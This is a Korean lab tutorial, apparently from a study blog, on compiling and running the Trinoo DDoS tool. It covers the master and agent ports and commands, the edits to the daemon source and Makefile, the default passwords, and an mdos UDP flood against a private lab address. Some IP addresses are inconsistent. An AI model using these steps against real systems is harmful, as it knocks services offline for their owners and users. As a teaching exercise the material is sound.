Dos 공격

목차

1. Dos 공격

1-1 DDos 공격 - Trinoo

 

 

1. Dos 공격

1-1 DDos 공격 - Trinoo

Trinoo는 디도스 공격을 수행할 수 있는 옛날 공격 툴로, 32bit OS에서만 컴파일이 가능하다.

# getconf LONG_BIT 명령어를 통해 몇 비트 OS인지 확인할 수 있다.

접속자	대상	프로토콜	포트
공격자	마스터	TCP	27665
마스터	에이전트	UDP	27444
에이전트	마스터	UDP	31335
에이전트	공격대상	UDP

 

※ 마스터 명령

명령	설명
die	마스터 작동 중지
quit	마스터 로그아웃
dos(mdos) IP	IP를 대상으로 공격
mtimer N	공격 시간 지정. N 범위 : 1~1999

 

● DDos 공격

디도스 공격은 하나의 마스터가 여러 에이전트(좀비 PC)에게 명령을 내려 공격 대상에 무수히 많은 패킷을 보내 공격 대상의 서버를 무력화 시키는 공격 기법이다.

DDos 공격 방식

 

- 마스터 이용 프로그램: master

- 에이전트 이용 프로그램: daemon

 

● Trinoo를 이용한 공격 실습

Trinoo를 이용하여 하나의 마스터(192.168.11.31)와 하나의 에이전트(192.168.11.32)를 생성하여 공격 대상(192.168.11.35)을 공격해본다.

 

① 마스터 측 (trinoo 압축 파일 다운로드 이후) Trinoo  컴파일 (192.168.11.31)

- trinoo 압축 해제 시 디렉토리가 아닌 파일이 하나씩 다 풀리므로 반드시 trinoo 디렉토리 생성 후 그 안에서 해제한다.

# tar xvf trinoo.tar

   : trinoo 소스 압축을 해제한다. 

 

- master 디렉토리에 들어가 컴파일한다.

# cd master/

# make

master 디렉토리에 생성된 master

 

② 에이전트 측 (trinoo 압축 파일 다운로드 이후) 컴파일과 실행 (192.168.11.32)

- trinoo 디렉토리 생성 후 그 안에서 압축을 해제한다.

# tar xvf trinoo.tar

 

- daemon/ns.c 파일에 마스터 IP를 지정해준다.

 . . .
 
/* #define PROCNAME "httpd" */
char *master[] = {
  "192.168.11.31", // 기존의 ip는 지우고 마스터 ip 작성
  NULL
};

 . . .

 

 

- 수정된 ns.c파일을 master 디렉토리로 이동시키고 master 디렉토리의 Makefile을 다음과 같이 수정한다.

#slackware..
#LIBS=
LIBS=   -lcrypt
master: master.c blowfish.c
        gcc -o daemon ns.c blowfish.c ${LIBS}
        strip daemon

에이전트 측 설정이므로 에이전트에 맞게 수정하는 과정으로, 'master'로 되어있는 부분을 'daemon'으로 수정한다.

 

③ 마스터 실행(192.168.10.31)

- 마스터 측 master 디렉토리에 master를 실행한다.

# ./master

암호는 gOrave 이다.

master 실행 화면

 

④ 공격을 위한 마스터 접속 (192.168.11.31)

- 마스터에 접속하는 것으로 어디서든 telnet 192.168.11.31 27665 로 접속한다.

# telnet 192.168.11.31 27665

암호는 betaalmostdone 이다.

master 접속 화면

 

bcast 명령은 에이전트 목록을 검색한다. 검색되지 않을 수 에이전트 측 daemon을 재실행한다.

mdos명령을 이용해 대상을 공격한다.

공격 시도 화면

 

공격 시 다음과 같이 에이전트(192.168.11.35)에서 공격 대상(192.168.11.35)에게 수많은 UDP 패킷이 날아가는 것을 확인할 수 있다.

공격 시 패킷 캡처 화면